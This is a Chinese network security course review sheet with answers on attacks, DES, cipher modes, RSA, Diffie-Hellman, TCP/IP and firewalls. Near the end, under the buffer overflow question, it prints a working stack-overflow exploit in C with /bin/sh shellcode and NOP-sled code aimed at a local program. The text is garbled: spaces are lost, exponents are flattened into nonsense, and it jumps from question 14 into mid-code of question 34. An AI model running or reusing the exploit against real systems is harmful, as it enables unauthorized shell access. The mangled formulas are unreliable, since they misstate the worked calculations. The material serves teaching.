密钥指令引用的内存不能为read

06计算机网络安全复习思考题及参考答案2006-6-161.
对安全的攻击可分为哪几种2.
什么是理论安全(无条件安全),什么是实际安全(计算上安全)3.
什么是对称密码体制什么是非对称密码体制什么是分组密码什么是流密码4.
DES算法主要有哪几部分组成它实际上执行的是哪两类操作作用5.
什么是加密过程中的雪崩效应6.
DES中S盒的作用和构造有哪两种三重DES7.
讲述双重DES中存在的中途相遇攻击8.
了解分组密码中的ECB、CBC、CFB、OFB方式9.
什么是链路加密,什么是端到端加密10.
随机数、SequenceNumber和Nonces在密码系统中的作用11.
公开密钥密码体制的基本原理,有哪些主要成份公开密钥与私有密钥的作用是什么12.
有哪些密钥管理和分发的方法如何用Diffe-Hellman的方法实现密钥分发,获得会话密钥.
13.
什么是数字签名有哪些基本的数字签名方法14.
RSA和ElGamal的加密和签名算法是怎样实现的如何实现又保密又认证的数据传送15.
什么是报文认证码(MAC)它与报文哈希值的主要区别是什么16.
用于认证的Hash函数应该满足哪些要求17.
Kerberos用来解决什么问题它的基本实现过程18.
ISO/OSI的七层协议以及TCP/IP的四层协议19.
MAC地址、IP地址以及端口号的长度、作用,它们是在TCP/IP协议的哪一层使用20.
中继器、集线器、网桥、二层交换机、路由器、网关的概念21.
子网掩码的作用,子网的划分22.
TCP的连接建立以及连接释放过程23.
TCP中的SYN、RST、FIN,以及可能出现的扫描和攻击.
24.
UDP和TCP协议的区别,哪些网络应用使用UDP25.
ICMP工作的层,一些常用服务(FTP、HTTP、telnet、SMTP….
.
)的默认端口26.
简述ping指令、ipconfig指令、netstat指令、net指令、Tracert和at指令的功能和用途.
27.
以太网的工作原理和网卡的工作模式28.
网络扫描和监听的原理,共享式网络和交换式网络的监听.
29.
IDS的原理和不足30.
Unicode漏洞和拒绝服务的种类与原理31.
木马和后门的区别32.
Linux中的进程调度机制33.
缓冲区溢出的原理,堆溢出和栈溢出的区别34.
如何保护自己的代码免受缓冲区溢出攻击,缓冲区溢出攻击的编程35.
ACKStorm和DoS攻击36.
简述防火墙的分类,并说明分组过滤防火墙的基本原理.
包过滤防火墙的缺点是什么1说明:1.
以下答案是在复习过程中随手整理的,仅供参考;2.
在答题中一般都标注了出处,如:(66/ppt1)说明来源于杨老师的第一讲"计算机网络安全01.
ppt"文件中的第66页;3.
有的题目解答过于罗嗦(如第一题,对各种攻击的解释部分按照题意不需要记忆),目的只是便于快速理解,所谓理解便于记忆嘛.
CSLi2006-6-27整理1.
对安全的攻击可分为哪几种对安全的攻击(66/ppt1)Interruption:Thisisanattackonavailability(中断服务)Interception:Thisisanattackonconfidentiality(拦截、监听)Modification:Thisisanattackonintegrity(消息篡改)Fabrication:Thisisanattackonauthenticity(伪装)答:网络窃听:监听局域网信道,窃取有用的数据分组,分析破解用户名、密码等;IP欺骗:在通信系统中主动插入和删除信息分组,发送一个来自被信任计算机的伪造信息分组,以使目的计算机信任并接收;路由攻击:攻击者告诉网上的两个结点,它们之间最近的传输线路就是经过他这台计算机的路径,这就使该台计算机的侦听变得更容易;(ARP病毒)拒绝服务(DOS)攻击:(1)发送SYN信息分组:对网络上一台计算机提出大量的通信请求,使该台计算机崩溃,且难以跟踪攻击源;(2)邮件炸弹:给某人发送过量的电子邮件可使他的系统满载直至崩溃;拒绝服务攻击的对象不同,可以是邮件服务器、路由器或Web服务器等.
分布式拒绝服务(DDOS)攻击:这种攻击与传统的拒绝服务攻击一样,只不过进攻源不只一个.
数据驱动攻击:数据驱动攻击是通过向某个程序发送数据,以产生非预期结果的攻击,通常为攻击者给出访问目标系统的权限,数据驱动攻击分为缓冲区溢出攻击、格式化字符串攻击、输入验证攻击、同步漏洞攻击、信任漏洞攻击等.

攻击技术攻击方法踩点无Ping扫描ipsweep端口扫描portsweep,resetscan操作系统辨识queso扫描漏洞扫描satan,mscan探测查点ls,ntinfoscan键击记录xsnoop网络监听illegalsniffer非法访问数据secret攻击窃听攫取密码snmpget,ncftp2获取口令guest,guessftp,guesstelnet,guesspop,dict恶意代码sshtrojan,ppmacro,xlock,sechole,casesen,framespoofer欺骗网络欺骗arppoison,httptunnel带宽耗尽型smurf,udpstorm资源耗尽型系统资源耗尽型mailbomb,processtable,sshprocesstable,neptune,apache2,back导致异常型crassiis,land,treadrop,dosnuke,pod,syslogd,selfping,warezmaster,warezclient拒绝服务欺骗型tcpreset缓冲区溢出攻击sendmail,imap,named,eject,ffbconfig,fdformat,xterm,格式化字符串loadmodule输入验证攻击phf同步漏洞攻击ps攻击数据驱动攻击信任漏洞攻击ftpwrite,yaga,ntfsdos,anypw,perl,sqlattack日志清理无安装后门netcat,netbus隐藏内核套件无各种技术的融合无攻击技术分类层次结构2.
什么是理论安全(无条件安全),什么是实际安全(计算上安全)(6/ppt2)答:TheoreticalSecurity(orPerfectSecurity)andPracticalSecure(orComputationallySecure)理论安全,或无条件安全:攻击者无论截获多少密文,都无法得到足够的信息来唯一地决定明文.
Shannon用理论证明:欲达理论安全,加密密钥长度必须大于等于明文长度,密钥只用一次,用完即丢,即一次一密,One-timePad,不实用.
实际安全,或计算上安全:如果攻击者拥有无限资源,任何密码系统都是可以被破译的;但是,在有限的资源范围内,攻击者都不能通过系统地分析方法来破解系统,则称这个系统是计算上安全的或破译这个系统是计算上不可行(ComputationallyInfeasible).
3.
什么是对称密码体制什么是非对称密码体制什么是分组密码什么是流密码答:·对称密码体制和非对称密码体制(17/ppt2)对称密码体制(SymmetricSystem,One-keySystem,Private-keySystem)加密密钥和解密密钥相同,或者一个密钥可以从另一个导出,能加密就能解密,加密能力和解密能力是结合在一起的,开放性差.
实例:DES非对称密码体制(AsymmetricSystem,Two-keySystem,Public-keySystem)3加密密钥和解密密钥不相同,从一个密钥导出另一个密钥是计算上不可行的,加密能力和解密能力是分开的,开放性好.
实例:RSA·分组密码:是在密钥控制下,一次变换一个明文分组的密码体制.
(24/ppt2)(1)要求分组长度足够大,以防穷举明文空间攻击密钥量应足够大,以防穷举密钥空间攻击算法足够复杂,攻击者除了用穷举法之外,找不到其他简洁的数学破译方法(2)基本方法替换substitution―为2k个可能的输入确定一个k位的输出,有2k!
/k!
之多.
变位transposition-对输入的k个比特重新排列,得新的k位输出,有k!
个.
将两者结合,对每一块分组基于密钥替换一次,再变位一次,构成一轮;重复多次构成循环,这个循环的正向进行或反向进行则构成了加密和解密.
实例:DES·流密码:是将明文划分成字符(如单个字母),或其编码的基本单元(如0,1数字),字符分别与密钥流作用进行加密,解密时以同步产生的同样的密钥流实现.

流密码强度完全依赖于密钥序列的随机性和不可预测性;核心问题是密钥流生成器的设计;保持收发两端密钥流的精确同步是实现可靠解密的关键技术.
密钥流产生器密钥k明文m密文c流密码体制模型异或运算4.
DES算法主要有哪几部分组成它实际上执行的是哪两类操作答:DES算法采用56位的密钥,在16个周期(或round)内完成对64位数据块的加密.
每个round所用之子密钥由初始密钥分解而来.
组成如图:4DES算法实际上执行的两类操作是:置换(初始置换、扩充置换及最终逆初始置换)和替代(S盒),另外还有基于密码的复杂计算.
5.
什么是加密过程中的雪崩效应答:雪崩效应(AvalancheEffect)是指明文或密钥的一比特的变化,引起密文许多比特的改变.
如果变化太小,就可能找到一种方法减小有待搜索的明文和密文空间的大小.

如果用同样密钥加密只差一比特的两个明文:0000000000000000.
.
.
.
.
.
000000001000000000000000.
.
.
.
.
.
000000003次循环以后密文有21个比特不同,16次循环后有34个比特不同如果用只差一比特的两个密钥加密同样明文:3次循环以后密文有14个比特不同,16次循环后有35个比特不同6.
DES中S盒的作用和构造有哪两种三重DES答:SubstitutionBoxesS(32/ppt2)HaveeightS-boxeswhichmap6to4bits5EachS-boxisactually4little4bitboxesouterbits1&6(rowbits)selectonerowsinnerbits2-5(colbits)aresubstitutedresultis8lotsof4bits,or32bitsRowselectiondependsonbothdata&keyfeatureknownasautoclaving(autokeying)Example:S(1809123d11173839)=5fd25e03(45/ppt2)三重DES:使用加密-解密-加密的序列C=EK1[DK2[EK1[P]]],穷举攻击的代重DES:使用加密-解密-加密的序列C=EK3[DK2[EK1[P]]],穷举攻击的代.
讲述双重DES中存在的中途相遇攻击(44/ppt2)加密:C=EK2[EK1[P]],解密:两个密钥的价为2112.
三个密钥的三价为2168.
7答:双重DES:给定明文P和加密密钥K1和K2,P=DK1[DK2[C]],密钥长度为56x2=112位.
存在中途相遇攻击问题.
6中途相遇攻击对使用两次加密的分组密码都有效.
C=EK2[EK1[P]],则X=EK1[P]=DK2[C]若已知(P,C),则对256个可能的K1加密P,结果存入表中,按X值排序对256个可能的K2解密C,在表中寻找匹配如果产生匹配,则用一个新的明文密文对检测所得两个密钥如果两密钥产生正确的密文,则接受为正确密钥对任意给定的明文P,双重DES产生的密文有264可能,使用密钥有2112可能.
平均来说对一个给定的明文P,将产生给定密文C的不同的112位密钥的个数是2112/264=248,即虚警为248,再加上一个64位已知明文密文对,虚警降低到2-16,中途攻击检测到正确密钥的概率是1-2-16,攻击双重DES,工作量仅为256.
8.
了解分组密码中的ECB、CBC、CFB、OFB方式.
(46/ppt2)答:工作模式,指以这个密码算法为基础用不同方式构建的密码系统.
电子密码本(ECB)模式:直接使用分组密码的工作模式(明文分成64bit的分组进行加密,必要时填充,每个分组用同一密钥加密),其最大缺陷在于不能隐藏数据模式(相同明文对应相同密文),并且不能抵抗重放攻击.
分组链接(CBC)模式:每个明文分组在加密前首先和前一个分组的密文做逻辑异或,形成一条链,使用相同的密钥,其中,第一个分组和一个初始向量(IV)做异或,IV不用加密保存,但要求随消息更换.
该模式的优点在于可以隐藏明文数据模式,并能识别密文消息是否被篡改,缺点是错误会扩散(一位的错误会影响到其后的位).
密码反馈(CFB)模式:类似于CBC模式,采用比分组小的分块,在明文进行加密前先和上一个密文分块做异或,形制类似于CBC.
是一种将DES转化成流密码的技术,不再要求报文被填充成整个分组,可以实时运行,如果要传输一个字符流,每个字符都可以使用面向字符的流密码立刻加密和传输.

7输出反馈(OFB)模式:对每一分块,加密时Ci=PiXorE(Si-1),解密时Pi=CiXorE(Si-1).
Si为与明文或密文相关的状态.
其余性质和CBC相同.
结构上类似CFB,但是OFB中加密函数输出被反馈回移位寄存器,CFB中是密文单元被反馈回移位寄存器.
优点是传输中的比特差错不会传播,缺点是比CFB更容易受报文流篡改攻击.
从上面的分析可以看出,隐藏明文数据模式主要采用的是和上下文做xor,但这样带来的问题是错误的传播,并且会在一定程度上降低加、解密的速度.
9.
什么是链路加密,什么是端到端加密答:(69/ppt2)链路加密:侧重与在通信链路上而不考虑信源和信宿,是对保密信息通过各链路采用不同的加密密钥提供安全保护.
链路加密是面向节点的,对于网络高层主体是透明的,它对高层的协议信息(地址、检错、帧头帧尾)都加密,因此数据在传输中是密文的,但在中央节点必须解密得到路由信息.
端到端加密:指信息由发送端自动加密,并进入TCP/IP数据包回封,然后作为不可阅读和不可识别的数据穿过互联网,当这些信息一旦到达目的地,将自动重组、解密,成为可读数据.
端到端加密是面向网络高层主体的,它不对下层协议进行信息加密,协议信息以明文形式传输,用户数据在中央节点不需解密.
10.
随机数、SequenceNumber和Nonces在密码系统中的作用答:随机数randomnumbers的作用(88/ppt2)用于相互鉴别authentication,以防重放攻击会话密钥sessionkeys的产生Publickeygeneration,如在RSA算法中产生密钥Key-streamforaone-timepadNonces(现时,可以是时间戳、计数器或随机数):在认证协议中防止重放SequenceNumber:防止重放(实际效果不好)11.
公开密钥密码体制的基本原理,有哪些主要成份公开密钥与私有密钥的作用是什么答:公开密钥密码系统的原理(3/ppt3)非对称密码体制(公开密钥密码体制)的基本特点加密能力与解密能力是分开的密钥分发简单需要保存的密钥量大大减少,N个用户只需要N个可满足不相识的人之间保密通信可以实现数字签名基于FAC(factorizationproblem)的RSA算法为非对称密码体制的实现提供了理论基础.
8RSA的安全性问题依赖于大合数的素因子分解的困难性.
公钥密码体制组成:明文、加密算法、公开密钥和私有密钥、密文、解密算法.

公开密钥:加密密钥,公之于众,谁都可以用私有密钥:解密密钥,只有解密人自己知道作用:加密/解密:发送方用接收方的公开密钥加密报文,加密后的报文只能用接收方独有的私有密钥解密;数字签名:发送方用自己的私有密钥"签署"报文;密钥交换:两方合作以交换会话密钥.
12.
有哪些密钥管理和分发的方法如何用Diffe-Hellman的方法实现密钥分发,获得会话密钥.
答:密钥管理是加密系统的重要组成部分.
目前对称加密算法的密钥管理主要有:存储型和会话型两种.
其中存储型由于存储量大,密钥分发和更改困难,在大系统中很难采用.
会话型密钥管理方式通过公钥保护密钥会话过程(如CA),或通过专用服务器认证后签发票据完成密钥协商(如Kerberos).
层次化的密钥管理方式:层次化密钥控制(83/ppt2)建立一系列KDC,各个KDC之间存在层次关系,使得主密钥分配所涉及的工作量减至最小,因为大部分的主密钥都是由一个本地的KDC和它的本地实体共享的,并将出错或受到破坏的KDC的危害限制在它的本地区域会话密钥的使用寿命会话密钥更换越频繁就越安全对于面向连接的协议,每次会话使用新的密钥对于无连接的协议,每次交互使用新的密钥,或者每个固定时间或对于一定数量的交互使用一个给定的会话密钥密钥分发的多种方法:(78/ppt2)1.
AcanselectkeyandphysicallydelivertoB2.
Thirdpartycanselect&deliverkeytoA&B3.
IfA&Bhavecommunicatedpreviouslycanusepreviouskeytoencryptanewkey4.
IfA&BhavesecurecommunicationswithathirdpartyC,CcanrelaykeybetweenA&B(1)密钥由A选择亲自交给B(2)第三方选择,交给A和B(3)如果A和B最近使用过某密钥,其中一方可以用它加密一个新密钥然后再发给另一9方(4)A和B与的三方C均有秘密渠道,C将密钥分别秘密送给A和BDiffie-Hellman算法使两个用户可以安全地交换密钥,以便在后续的通讯中使用该密钥加密信息.
该算法本身只限于进行密钥交换.
用Diffie-Hellman的方法实现密钥分发:(33/ppt3)计算题,参考"网络安全作业1-4(0625).
pdf".
用Diffie-Hellman的方法实现密钥共享设用户A和B,共享α和P,α是本原元素,P是大素数.
A、B各有一私有密钥,xA和xB,公布他们的公开密钥:BYA=αxAmodP,YB=αmodP.
BxB双方共享的会话密钥为:A:KAB=(YB)modP=αmodPBxAxAxBB:KBA=(YA)xBmodP=αxBxAmodP例:P=11,α=7,xA=2,xB=3.
YA=αxAmodP=72mod11=5YB=αmodP=7mod11=2BxB3KAB=KBA=αxAxBmodP=76mod11=413.
什么是数字签名有哪些基本的数字签名方法答:数字签名的含义(52/ppt3)数字签名的简单定义:数字签名是使以数字形式存储的明文信息经过特定密码变换生成密文,作为相应明文的签名,使明文信息的接收者能够验证信息确实来自合法用户,以及确认信息发送者身份.
对数字签名的基本要求签名接收者能容易地验证签字者对消息所做的数字签名;任何人,包括签名接收者,都不能伪造签名者的签字;发生争议时,可由第三方解决争议.
数字签名基本分类:(54/ppt3)直接数字签名直接数字签名仅涉及通信方(信源、信宿),假定信宿知道信源的公开密钥,数字签名通过信源对整个报文用私有密钥加密,或对报文的摘要加密来实现.
弱点在于方案的有效性依赖于信源私有密钥的安全性.
需仲裁的数字签名直接数字签名的问题可以通过仲裁解决,签名方的签名报文首先送给仲裁者,仲裁者对报文和签名进行测试以检验出处和内容,然后注上日期和仲裁说明后发给接收方.
1014.
RSA和ElGamal的加密和签名算法是怎样实现的如何实现又保密又认证的数据传送答:(参考:RSA密码体制基本原理16/ppt3、用数字签名和加密同时实现报文的加密和认证的传送60/ppt3、ElGamal的数字签名方法62/ppt3)计算题,参考"网络安全作业1-4(0625).
pdf".
RSA方法的数字签名方法:给定n=pq,p和q是大素数,edmodφ(n)=1,公开密钥为(n,e),秘密密钥为(n,d)加密:m∈[0,n-1],gcd(m,n)=1,则c=memodn解密:m=cdmodn=(memodn)dmodn=medmodn=m签名:s=mdmodn验证:m=semodn=(mdmodn)emodn=medmodn=m例:n=55=11x5,φ(n)=40,选d=11,则e=11,m=3,s=311mod55=47验证:m=s11mod55=4711mod55=3n=65,φ(n)=48,选d=5,则e=29,m=3,s=35mod65=48验证:m=4829mod65=3RSA,数字签名、加密同时实现报文的加密和认证的传送方法:设有用户A和B,A:nA,eA,dA,EA,DA,B:nB,eB,dB,EBBB,DB,B从A→B:Secrecy:c=EB(m)=mmodnBeBBBm=DB(c)=cmodnB=mmodnBdBeBdBBAuthenticity:c=DA(m)=mdAmodnAm=EA(c)=ceAmodnA=meAdAmodnA=mBothsecrecyandauthenticity:c=EB(DBA(m))=(mmodndAA)modneBBBor:c=DA(EB(m))=(mmodnBeBBB)dAmodnAm=EA(DB(c))=EBA(DBB(EB(DBA(m))))=(((mdAmodnA)eBmodnB)modnBdBBB)eAmodnA=mor:m=DB(EA(c))=DB(EA(DA(EB(m))))=(((meBmodnB)modnBdAA)modneAA)modndBBB=m注意:1.
nA#include#defineALIGN0#defineOFFSET0#defineRET_POSITION102430#defineRANGE20#defineNOP0x90//charshellcode[]="…";charshellcode[]=\"\\xeb\\x1f\"/*jmp0x1f*/\"\\x5e\"/*popl%esi*/\"\\x89\\x76\\x08\"/*movl%esi,0x8(%esi)*/\"\\x31\\xc0\"/*xorl%eax,%eax*/\"\\x88\\x46\\x07\"/*movb%eax,0x7(%esi)*/\"\\x89\\x46\\x0c\"/*movl%eax,0xc(%esi)*/\"\\xb0\\x0b\"/*movb$0xb,%al*/\"\\x89\\xf3\"/*movl%esi,%ebx*/\"\\x8d\\x4e\\x08\"/*leal0x8(%esi),%ecx*/\"\\x8d\\x56\\x0c\"/*leal0xc(%esi),%edx*/\"\\xcd\\x80\"/*int$0x80*/\"\\x31\\xdb\"/*xorl%ebx,%ebx*/\"\\x89\\xd8\"/*movl%ebx,%eax*/\"\\x40\"/*inc%eax*/\"\\xcd\\x80\"/*int$0x80*/\"\\xe8\\xdc\\xff\\xff\\xff\"/*call-0x24*/\"/bin/sh\"/*.
string\\\"/bin/sh\\\"*///得到当前堆栈顶端的值esp,用来计算argv[1]的地址.
//有关汇编语言的语法参见最后的"附录"unsignedlongget_sp(void){__asm__("movl%esp,%eax");}main(intargc,char**argv){char*ptr,buff[RET_POSITION+RANGE+ALIGN+1];longaddr;unsignedlongsp;inti;intoffset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;//预写好的shellcode汇编代码作为目标程序.
/vulnerable1的rgv[1]置入//所以我们要(预先猜测)计算出它的地址,以便溢出后跳转至此if(argc>1)offset=atoi(argv[1]);sp=get_sp();addr=sp-offset;//计算参数argv[1]的相对地址31/*这段程序和后面紧跟着的for循环完成的任务是一样的:填充我们猜测的buffer的地址.
我们使用其中一个for循环即可.
for(i=0;i>8;buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;buff[i+ALIGN+3]=(addr&0xff000000)>>24;}*/for(i=0;iNOP指令意思是什么都不作,跳过一个CPU指令周期.
在intel机器上,NOP指令的机器码为0x90.
S为shellcode.
A为我们猜测的buffer的地址.
这样,A猜大了也可以落在N上,并且最终会执行到S.
这个改进大大提高了猜测的命中率,有时几乎可以一次命中.
*/printf("Jumpto0x%08x\n",addr);/*execl用来执行目标程序.
/vulnerable1,buff是我们精心制作的溢出字符串,作为.
/vulnerable1的参数提供.
*/execl(".
/vulnerable1","vulnerable1",buff,0);}3235.
ACKStorm和DoS攻击答:当一个主机接收到一个不期望的数据包的时候,它会用自己的序列号发送ACK,而这个包本身也是不可被接受的.
于是,两边不停地发送ACK包,形成ACK包的循环,称为ACK风暴.
如果有一个ACK包丢掉,则风暴停止.
在不同步的情况下,当服务器发送数据给客户如果攻击者不对这份数据响应ACK的话,这份数据会被重传,因为服务器收不到ACK,并且会形成ACK风暴,最终,连接会被终止如果攻击者对这份数据作出响应,则只有一个ACK风暴DoS攻击:参见第30题的"拒绝服务(DoS)攻击"(19/ppt1)36.
简述防火墙的分类,并说明分组过滤防火墙的基本原理.
包过滤防火墙的缺点是什么答:防火墙的分类:(21/ppt15)分组过滤(PacketFiltering):作用在协议组的网络层和传输层,根据分组包头源地址、目的地址和端口号、协议类型等标志确定是否允许数据包通过,只有满足过滤逻辑的数据包才被转发到相应的目的地的出口端,其余的数据包则从数据流中丢弃.
包过滤:第一代防火墙和最基本形式防火墙,检查每一个通过的网络包,或者丢弃,或者放行,取决于所建立的一套规则.
应用代理(ApplicationProxy):也叫应用网关(ApplicationGateway),它作用在应用层,其特点是完全"阻隔"网络通信流,通过对每种应用服务编制专门的代理程序,实现监视和控制应用层通信流的作用.
实际中的应用网关通常由专用工作站实现.

电路级网关,又叫状态检测(StatusDetection):直接对分组里的数据进行处理,并且结合前后分组的数据进行综合判断,然后决定是否允许该数据包通过.